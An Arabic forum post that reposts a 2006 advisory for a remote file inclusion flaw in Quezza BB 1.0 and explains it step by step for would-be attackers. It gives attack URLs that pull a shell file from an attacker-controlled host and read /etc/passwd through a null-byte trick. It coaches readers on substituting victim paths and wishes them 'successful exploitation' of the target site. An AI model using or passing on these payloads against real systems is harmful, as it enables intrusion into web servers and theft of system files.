tomy_adam is on a distinguished road
السلام عليكم
تفضلو الثغرة بالانجلش
Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx(@)nukedx.com web:
www.nukedx.comThis exploit works on Quezza BB <= 1.0
Original advisory can be found at:
http://www.nukedx.com/?viewdoc=30http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00Succesful exploitation register_globals on for both examples.
# nukedx.com [2006-04-21]
# milw0rm.com [2006-05-17]
نبدأ شرح الثغرة (( طبعا هاذي هدية مني لوجه الله ورسوله على الرغم اني ماخذ عهد ما اشرح لحد ))
_________________________________________
من خلال الشرح نقدر نعرف ان الثغرة تعتمد على برنامج مصاب يتم تنصيبه على موقع معين وبحالتنا هاذي البرنامج هو
Quezza BB <= 1.0
نكمل شرح اول سطر بشرح الثغرة حتى يتمكن اصحابنا من معرفة وفهم الثغرات من اول نزولها
Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability.
شرحنا انه البرنامج المصاب جويزا
____________________
Method found by nukedx,
الطريقة (( طريقة وليست سكريبت ولا شي ولا بطيخ ولا كودااات )) هي من اكتشاف نيوكيدكس
Contacts > ICQ: 10072 MSN/Mail:nukedx(@)nukedx.com web:
www.nukedx.comمعلومات عن المكتشف وماتهمنا الا لذول الي لهم برستيج ممكن يوصلهم انهم يكلمو مكتشف الثغرة (( مع تحفظاتي على محادثة امثالهم وذلك لتجارب شخصية ))
___________________
Original advisory can be found at:
http://www.nukedx.com/?viewdoc=30هاذ للي يبي يستزيد من الموضوع ويروح لموقع المكتشف كمان ما يهمنا (( معظم الحالات ))
http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=http://yourhost.com/cmd.txt?هاذ اول رابط وهو الرابط الي يمكن استخدامه لتطبيق الثغرة بالبرنامج (( او طريقة الوصول لشي ممكن يفيدنا بهالموقع ))
نلاحط ان الموقع مقسم اولا لبروتوكول الاتصال اتش تي تي بي ثانيا الفيكتم وهو(ReMoTeR) الموقع المصاب (( والي يبدأ من بعد الشرطتين وحتى كلمة (( كوم ))
____________________
ثانيا
[QuezzaPath] >> هاذ الباث تبع البرنامج على الموقع يعني المسار الي مخزن عليه
/includes/class_template.php?quezza_root_path= تبقى ثاااااااابتة دائما لأنه طريقة تنزيل البرنامج في نسخته هاذي تركب على (ReMoTeR)هالمسار لحد علامة الاستفهام وبعد علامة الاستفهام نلاحظ وجود كلمة كويزا روت باث(( ولون بشرحها لكم هاذي والله محتاااااار ؟؟؟؟!!!!!!!)) >>> المهم هاذي (ReMoTeR)كود يربطلك تحكم المسار الاول بالمسار الثاني (( خلااااااااص انسو ولا كأ ني حكيت شي ))
___________________
http://yourhost.com/cmd.txtهاذ الرابط الي بيفتح الرابط الاول بطريقة (( علمية جدا مملة وجدا عبقرية ))
طبعا هالرابط هو رابط الشل مالك
ونلاحظ انه يجب ان يكون ملف تكست حيث(ReMoTeR) بعض الاحيان ينبغي ان يكون ملف بي اتش بي او غيره وغيراااته
لكن هالمرة دائما كون حذر انه يكون ملف تكست (( الشل = تكست ))
________________________________________
؟ شااايفين علامة هالاستفهاااااااام >>> حذااااااااار (ReMoTeR)حذااااااااااار حد ينساها
_______________________________________
والرابط الي تحته
http://[victim]/[QuezzaPath]/includes/class_template.php?quezza_root_path=/etc/passwd%00هو طريقة ثانية للاستفادة من الثغرة
وشرحها بنفس شرح الطريقة الاولى بتغيير المتغيرات من الدومين للموقع والمسار المخزن عليه البرنامج
________________________________________
الحين:
Succesful exploitation register_globals on for both examples.
يتمنى استثمار موفق لهالثغرة وتسجل جلوبالز على هالموقع المسكين باستخدام كلا الطريقتين
_________________________________________
واخيراااااااااااااا
# nukedx.com [2006-04-21]
# milw0rm.com [2006-05-17]
وهي اضافات كلا الموقعين الي وفرو لك الاطلاع على هالاستثمار
حقوق ملكية فكرية يعني خخخخخخخخخخ
_________________________________________
والحين حقوقي انا الفكرية
لاصحاب القص والنسخ واللصق
حذار حذار
اقل ما فيها قولو اسم الكاااااااتب
tomy_adam
حقوق الشرح للمواقع العالمية اولا ثم لي